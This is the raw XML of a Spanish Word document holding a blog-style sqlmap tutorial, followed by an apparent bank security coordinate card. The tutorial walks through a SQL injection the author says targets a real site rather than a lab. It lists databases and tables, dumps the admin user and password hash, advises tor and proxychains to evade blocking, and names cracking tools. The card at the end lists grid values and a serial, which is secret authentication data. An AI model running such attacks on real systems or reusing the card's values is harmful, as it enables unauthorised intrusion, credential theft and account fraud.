      <w:hyperlink r:id="rId10" w:anchor="comment-form" w:history="1">
        <w:r w:rsidRPr="003E3B3E">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="155780"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>No hay comentarios.</w:t>
        </w:r>
      </w:hyperlink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5905500" cy="3002280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="18" name="Imagen 18" descr="https://1.bp.blogspot.com/-3088FLmRRPM/V7AD7cw6gEI/AAAAAAAAAB8/EhhUHR2cNycS6S8q7qy13JlHLeqKwkZ5gCLcB/s1600/5rgfg46rg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3088FLmRRPM/V7AD7cw6gEI/AAAAAAAAAB8/EhhUHR2cNycS6S8q7qy13JlHLeqKwkZ5gCLcB/s1600/5rgfg46rg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br/>
        <w:t>¿Qué es SQL INJECTION? Y sobre todo ... ¿Qué es SQLMAP?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Antes de empezar con el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articulo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, vamos a aclarar estas dos preguntas.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SQL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INJECTION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 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Un ataque de inyección SQL consiste en la inserción o “Inyección”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de datos en una consulta SQL desde un cliente de aplicación.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El éxito en una inyección SQL puede leer datos sensibles de la base de datos,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Modificar los datos (Insertar, actualizar y borrar), realizar operaciones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de administración sobre la base de datos (Como reiniciar el DBMS),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Recuperar el contenido de un archivo del sistema de archivos del DBMS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3B3E" w:rsidRPr="003E3B3E" w:rsidRDefault="003E3B3E" w:rsidP="003E3B3E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>y, en algunos casos, ejecutar comandos en el sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3B3E" w:rsidRPr="003E3B3E" w:rsidRDefault="003E3B3E" w:rsidP="003E3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Según el proyecto OWASP TOP TEN, los ataques de SQL INJECTION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estan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primeros en el puesto de vulnerabilidades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critcas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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6073140" cy="4564380"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="17" name="Imagen 17" descr="https://2.bp.blogspot.com/-0fsATmBdrbc/V7AE4FMidcI/AAAAAAAAACI/L9C513OwOr8DvKPlR0tIbfRyNa1smGiUgCLcB/s1600/web-hackingtools-2015-32-638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2.bp.blogspot.com/-0fsATmBdrbc/V7AE4FMidcI/AAAAAAAAACI/L9C513OwOr8DvKPlR0tIbfRyNa1smGiUgCLcB/s1600/web-hackingtools-2015-32-638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 ========================================================================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Una vez entendido este concepto, vamos a pasar a explicar ... ¿Qué es SQLMAP?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SQLMAP es una herramienta de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penetration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testing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, que además es open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source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. Para automatizar los procesos de detectar y explotar vulnerabilidades de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SQLi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. Es una de las más utilizadas tanto en una auditoria, como en ataques externos. (Aunque en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mí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opinión, lo primordial seria entender bien como se realiza una inyección SQL manualmente, para luego facilitar nuestra vida con SQLMAP).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5753100" cy="1714500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Imagen 16" descr="https://1.bp.blogspot.com/-5FKHcZ2IwYo/V7AF-oh1DYI/AAAAAAAAACU/Rf_bSZ-2pCoboHJMwuFCZFHd1N5zpO8kgCLcB/s1600/xd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5FKHcZ2IwYo/V7AF-oh1DYI/AAAAAAAAACU/Rf_bSZ-2pCoboHJMwuFCZFHd1N5zpO8kgCLcB/s1600/xd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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Llegado a este punto, comprendimos de que se trata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SQLi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y la herramienta SQLMAP, así que vamos a hacer una pequeña prueba de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como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utilizar esta herramienta para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hackear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una base de datos. (Generalmente todos los ataques los hago dentro de un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enterno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controlado, pero está vez voy a hacer la excepción a la regla, ya que creo que las practicas se entienden mejor cuando se llevan a la vida real) Así que vamos a allá ...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Primero lo primero, necesitamos encontrar una página vulnerable, pero ... ¿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Como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podemos saber sí una página es vulnerable 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SQLi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? Supongamos que tenemos esta URL : </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="003E3B3E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="155780"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>https://www.paginavulnerable.com/index.php?ID=2</w:t>
        </w:r>
      </w:hyperlink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Basta simplemente con agregarle una comilla simple al final del número de ID,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así :</w:t>
      </w:r>
      <w:proofErr w:type="gram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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="003E3B3E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="155780"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>https://www.paginavulnerable.com/index.php?ID=2</w:t>
        </w:r>
      </w:hyperlink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'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 El siguiente error, nos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indicaria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que posiblemente la página es vulnerable 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SQLi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8542020" cy="350520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Imagen 15" descr="https://4.bp.blogspot.com/-19hgTL1kunw/V7AHcWmKLmI/AAAAAAAAACg/ZXMBgDb24zo0jaOfm6Uy2MzXrfCkvr1FACLcB/s1600/Sin%2Bt%25C3%25ADtulo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19hgTL1kunw/V7AHcWmKLmI/AAAAAAAAACg/ZXMBgDb24zo0jaOfm6Uy2MzXrfCkvr1FACLcB/s1600/Sin%2Bt%25C3%25ADtulo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0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Así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que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teniendo ya dicha página vulnerable, podemos pasar a lo divertido, al ataque con SQLMAP.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Sí no tenemos instalado SQLMAP, basta con abrir nuestra terminal y ejecutar el siguiente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comando :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="003E3B3E" w:rsidRPr="003E3B3E" w:rsidRDefault="003E3B3E" w:rsidP="003E3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70" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://github.com/sqlmapproject/sqlmap.git </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-dev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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="8305800" cy="5173980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="14" name="Imagen 14" descr="https://3.bp.blogspot.com/-BxbIbc_H76w/V7AIlTsSdnI/AAAAAAAAACs/uy0V5RDX_tkdEeMk-4KEfFMrxVncu5vMgCLcB/s1600/xd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.bp.blogspot.com/-BxbIbc_H76w/V7AIlTsSdnI/AAAAAAAAACs/uy0V5RDX_tkdEeMk-4KEfFMrxVncu5vMgCLcB/s1600/xd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70" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Courier New"/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t> 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Luego de haber instalado SQLMAP, sí escribimos en nuestra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terminal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 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sqlmap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-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hh</w:t>
      </w:r>
      <w:proofErr w:type="spell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Tendremos una serie de comandos que nos ayudará a familiarizarnos más con la herramienta.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NOTA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Antes de hacer un ataque con SQLMAP, debemos combinarlo con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tor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y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proxychains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, porque generalmente los servidores rechazarán nuestras peticiones.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Para agregar una URL vulnerable, usamos el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parametro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: -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="003E3B3E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="155780"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
            <w:lang w:val="es-CL"/>
          </w:rPr>
          <w:t>https://www.paginavulnerable.com/index.php?ID=2</w:t>
        </w:r>
      </w:hyperlink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Para listar las bases de datos que contiene el servidor, vamos a agregar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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parametro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--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dbs</w:t>
      </w:r>
      <w:proofErr w:type="spell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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6979920" cy="2423160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Imagen 13" descr="https://3.bp.blogspot.com/-4NajiWeZDrY/V7ALPvtax7I/AAAAAAAAAC4/Edt_HGVbcwYcn4PS_hYy1Hij6yAP_rKLQCLcB/s1600/Sin%2Bt%25C3%25ADtulo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3.bp.blogspot.com/-4NajiWeZDrY/V7ALPvtax7I/AAAAAAAAAC4/Edt_HGVbcwYcn4PS_hYy1Hij6yAP_rKLQCLcB/s1600/Sin%2Bt%25C3%25ADtulo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Luego en el proceso de que SQLMAP verifique sí el ID de la URL que le asignamos es vulnerable,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peude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que nos aparezcan unos avisos como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estos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 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6865620" cy="388620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Imagen 12" descr="https://3.bp.blogspot.com/-xbi-5IdBUyw/V7ALlqxCqCI/AAAAAAAAAC8/Gl9jUZ9VA94zqZFjoR_In6uGJvHT71LOgCLcB/s1600/Sin%2Bt%25C3%25ADtulo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xbi-5IdBUyw/V7ALlqxCqCI/AAAAAAAAAC8/Gl9jUZ9VA94zqZFjoR_In6uGJvHT71LOgCLcB/s1600/Sin%2Bt%25C3%25ADtulo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Como este ataque va a ser muy básico, no vamos a prestarle atención y simplemente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presionamos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"Y"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284720" cy="373380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="11" name="Imagen 11" descr="https://3.bp.blogspot.com/-yCXRhu11Flc/V7ANQNhHJcI/AAAAAAAAADM/Itf4S1L_278oPq2dWUlby-UAdFEIIcviQCLcB/s1600/Sin%2Bt%25C3%25ADtulo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yCXRhu11Flc/V7ANQNhHJcI/AAAAAAAAADM/Itf4S1L_278oPq2dWUlby-UAdFEIIcviQCLcB/s1600/Sin%2Bt%25C3%25ADtulo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 A este aviso le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presionamos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"N"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315200" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Imagen 10" descr="https://4.bp.blogspot.com/-AZvt5MHHJR4/V7ANgA6q_aI/AAAAAAAAADQ/ytd0AlvafE8VqdfoxzNxIp-9AxWPLOXywCLcB/s1600/Sin%2Bt%25C3%25ADtulo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4.bp.blogspot.com/-AZvt5MHHJR4/V7ANgA6q_aI/AAAAAAAAADQ/ytd0AlvafE8VqdfoxzNxIp-9AxWPLOXywCLcB/s1600/Sin%2Bt%25C3%25ADtulo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Y a este también le presionamos la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tecla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"N"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Como resultado, al pasarle los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parametros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-u y --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dbs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, obtenemos la lista de bases de datos de este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servidor :</w:t>
      </w:r>
      <w:proofErr w:type="gram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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7406640" cy="5516880"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="9" name="Imagen 9" descr="https://3.bp.blogspot.com/-XZW4gVE4PV4/V7AN9-z7nyI/AAAAAAAAADU/ff3DDHJpaQEXOF3sPfZxWxdr2hoFN0kmgCLcB/s1600/Sin%2Bt%25C3%25ADtulo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XZW4gVE4PV4/V7AN9-z7nyI/AAAAAAAAADU/ff3DDHJpaQEXOF3sPfZxWxdr2hoFN0kmgCLcB/s1600/Sin%2Bt%25C3%25ADtulo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Lo que obtuvimos fue la base de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datos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db363851433 (A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information_schema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no le prestemos atención, ya que es la que almacena información acerca de las bases de datos que mantiene el servidor)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Así que ahora que sabemos la base de datos, tenemos que listar las tablas que contiene, lo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cuál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podemos hacerlo con el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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parametro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-D (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nombredebasededatos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) y --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tables</w:t>
      </w:r>
      <w:proofErr w:type="spell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307580" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="8" name="Imagen 8" descr="https://3.bp.blogspot.com/-Te05ynWqpCQ/V7AOyTA7ftI/AAAAAAAAADg/1DQgr3VkGeQU5cbztV5UZlkIuB0xhfutgCLcB/s1600/Sin%2Bt%25C3%25ADtulo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.bp.blogspot.com/-Te05ynWqpCQ/V7AOyTA7ftI/AAAAAAAAADg/1DQgr3VkGeQU5cbztV5UZlkIuB0xhfutgCLcB/s1600/Sin%2Bt%25C3%25ADtulo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Y a continuación, lo que nos va a devolver va a ser lo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siguiente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 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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7437120" cy="5669280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7" name="Imagen 7" descr="https://2.bp.blogspot.com/-n98030PVlrA/V7APOkOZ6lI/AAAAAAAAADo/13NygXr5vVkeOrct-Fyk9-pvTo5NWLy5wCLcB/s1600/Sin%2Bt%25C3%25ADtulo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2.bp.blogspot.com/-n98030PVlrA/V7APOkOZ6lI/AAAAAAAAADo/13NygXr5vVkeOrct-Fyk9-pvTo5NWLy5wCLcB/s1600/Sin%2Bt%25C3%25ADtulo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Apuntamos a la base de datos "db363851433" Y nos trae la lista de tablas que contiene.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Muy bien, hasta ahora vamos excelente y todo es diversión, pero ahora vamos a buscar la tabla que nos interesa y es la tabla que contenga como registro, el usuario y contraseña del administrador. La cuál suponemos que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es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admin_user</w:t>
      </w:r>
      <w:proofErr w:type="spell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Entonces para saber que registros tiene esta tabla, debemos traer las columnas de la tabla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admin_user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pasandole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el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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parametro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-D db363851433 -T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admin_user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--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columns</w:t>
      </w:r>
      <w:proofErr w:type="spell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315200" cy="411480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="6" name="Imagen 6" descr="https://2.bp.blogspot.com/-IwP7tReHT4o/V7AQTGXycqI/AAAAAAAAAD4/du96rtabKIsxnZcSh6zzSBejZGCNP35RACLcB/s1600/Sin%2Bt%25C3%25ADtulo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IwP7tReHT4o/V7AQTGXycqI/AAAAAAAAAD4/du96rtabKIsxnZcSh6zzSBejZGCNP35RACLcB/s1600/Sin%2Bt%25C3%25ADtulo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Y a continuación nos va a traer las columnas que contiene la tabla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admin_user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y a su vez el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premio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admin_user_name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y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admin_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7429500" cy="5676900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Imagen 5" descr="https://3.bp.blogspot.com/-PmQGzKMb3Ms/V7AQzZ000WI/AAAAAAAAAD8/pcx7HQikSvcxsI0053EVsyLXET_SXaoPwCLcB/s1600/Sin%2Bt%25C3%25ADtulo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.bp.blogspot.com/-PmQGzKMb3Ms/V7AQzZ000WI/AAAAAAAAAD8/pcx7HQikSvcxsI0053EVsyLXET_SXaoPwCLcB/s1600/Sin%2Bt%25C3%25ADtulo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Así que ahora tenemos todo lo que necesitamos, sabemos la base de datos, cuantas tablas contiene y cuales son y que columnas tienen las tablas a las que apuntemos obviamente. ¿Pero y ahora, como podemos saber el usuario y la contraseña del administrador? </w:t>
      </w:r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Simple,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</w:rPr>
        <w:t>agregando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 el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</w:rPr>
        <w:t>parametro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</w:rPr>
        <w:t>dump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 -D db363851433 -T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</w:rPr>
        <w:t>admin_user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 -C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</w:rPr>
        <w:t>admin_user_name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,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</w:rPr>
        <w:t>admin_pass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</w:rPr>
        <w:t xml:space="preserve"> --dump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299960" cy="388620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Imagen 4" descr="https://3.bp.blogspot.com/-CWS9mEwslJg/V7ARlmn9mQI/AAAAAAAAAEM/jKNfgANlwSkmOx8ELxEJnxivAwF9ErvmwCLcB/s1600/Sin%2Bt%25C3%25ADtulo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.bp.blogspot.com/-CWS9mEwslJg/V7ARlmn9mQI/AAAAAAAAAEM/jKNfgANlwSkmOx8ELxEJnxivAwF9ErvmwCLcB/s1600/Sin%2Bt%25C3%25ADtulo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Quizás podría aparecernos un aviso como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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este,que</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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lo que nos pregunta es sí queremos guardar un archivo temporal para usarlo con otras herramientas, pero presionamos : "N"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223760" cy="579120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Imagen 3" descr="https://1.bp.blogspot.com/-8z-rK01ZHRM/V7ASEPf1xZI/AAAAAAAAAEQ/OvGuU6TSbcsgAXsgpjCnVOP0V-Rd25N5wCLcB/s1600/Sin%2Bt%25C3%25ADtulo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1.bp.blogspot.com/-8z-rK01ZHRM/V7ASEPf1xZI/AAAAAAAAAEQ/OvGuU6TSbcsgAXsgpjCnVOP0V-Rd25N5wCLcB/s1600/Sin%2Bt%25C3%25ADtulo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lastRenderedPageBreak/>
        <w:t xml:space="preserve">En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mí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opinión, el diccionario que utiliza SQLMAP, para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crackear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los hashes de las contraseñas, no es muy efectivo que digamos, así que </w:t>
      </w:r>
      <w:proofErr w:type="gram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presionamos :</w:t>
      </w:r>
      <w:proofErr w:type="gram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"N"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5669280" cy="228600"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2" name="Imagen 2" descr="https://2.bp.blogspot.com/-P4SbhdnHumU/V7ASofA1JnI/AAAAAAAAAEc/szM0yX5f-Y0ScLveh-WJCJIRcnQSBc9DwCLcB/s1600/Sin%2Bt%25C3%25ADtulo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2.bp.blogspot.com/-P4SbhdnHumU/V7ASofA1JnI/AAAAAAAAAEc/szM0yX5f-Y0ScLveh-WJCJIRcnQSBc9DwCLcB/s1600/Sin%2Bt%25C3%25ADtulo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  <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr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Y ... ¡Bingo! Tenemos el usuario de administrador y la contraseña (Pero la contraseña esta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hasheada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con un algoritmo de encriptación, así que para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crackearlo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, vamos a necesitar el uso de otra herramienta como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john-the-ripper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 xml:space="preserve"> o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3B3E" w:rsidRPr="003E3B3E" w:rsidRDefault="003E3B3E" w:rsidP="003E3B3E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555555"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3B3E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="155780"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="7475220" cy="5676900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Imagen 1" descr="https://1.bp.blogspot.com/-c9Y9zG_U4vU/V7ATL9uWP2I/AAAAAAAAAEk/mgY7n4_UgtcFYvIZimUFudYoZJ-n0qx8gCLcB/s1600/Sin%2Bt%25C3%25ADtulo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1.bp.blogspot.com/-c9Y9zG_U4vU/V7ATL9uWP2I/AAAAAAAAAEk/mgY7n4_UgtcFYvIZimUFudYoZJ-n0qx8gCLcB/s1600/Sin%2Bt%25C3%25ADtulo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3E" w:rsidRDefault="003E3B3E" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0098755C" w:rsidRDefault="0098755C" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0098755C" w:rsidRDefault="0098755C" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0098755C" w:rsidRDefault="0098755C" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0098755C" w:rsidRDefault="0098755C" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0098755C" w:rsidRDefault="00D74B41" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tarjeta de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>cordenadas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0098755C" w:rsidRDefault="0098755C" w:rsidP="006C2E07">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-C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D74B41" w:rsidTr="00D74B41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D74B41" w:rsidRDefault="00D74B41" w:rsidP="00D74B41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N°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B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C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O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D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V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Z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L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A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12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49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91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35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88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41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56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44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14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79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38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96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23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69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98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57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86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97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81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73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45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18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84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59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19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24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67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78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92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83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85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55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82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95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15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27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77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46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61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93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6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31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74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62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71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48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58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33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36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7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25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64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21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28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89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13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99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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D74B41" w:rsidTr="00D74B41">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279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87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22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26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94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51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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283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47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D74B41" w:rsidRDefault="00D74B41" w:rsidP="006C2E07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34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D74B41" w:rsidRDefault="00D74B41" w:rsidP="00D74B41">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0073744D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t>Informacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0073744D">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> por el 0500MICLAVE                Serial:2770275101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073744D" w:rsidRDefault="0073744D" w:rsidP="00D74B41">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0073744D" w:rsidRPr="0073744D" w:rsidRDefault="0073744D" w:rsidP="00D74B41">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0073744D" w:rsidRPr="007374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0EFF" w:usb1="0000785B" w:usb2="00000001" w:usb3="00000000" w:csb0="000001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activeWritingStyle w:appName="MSWord" w:lang="es-CL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E07"/>
    <w:rsid w:val="003E3B3E"/>
    <w:rsid w:val="006C2E07"/>
    <w:rsid w:val="0073744D"/>
    <w:rsid w:val="008044F5"/>
    <w:rsid w:val="0098755C"/>
    <w:rsid w:val="00AE55E1"/>
    <w:rsid w:val="00CF4838"/>
    <w:rsid w:val="00D7063A"/>
    <w:rsid w:val="00D74B41"/>
    <w:rsid w:val="00F5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D2537"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB55F2D7-5C0F-43C4-8B02-24428363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528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F528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C2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F528B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F528B5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text-align-justify">
    <w:name w:val="text-align-justify"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F52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F528B5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F528B5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52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528B5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528B5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Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F528B5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F528B5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-variable">
    <w:name w:val="hljs-variable"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F528B5"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00F528B5"/>
  </w:style>
  <w:style w:type="character" w:styleId="nfasis">
    <w:name w:val="Emphasis"/>
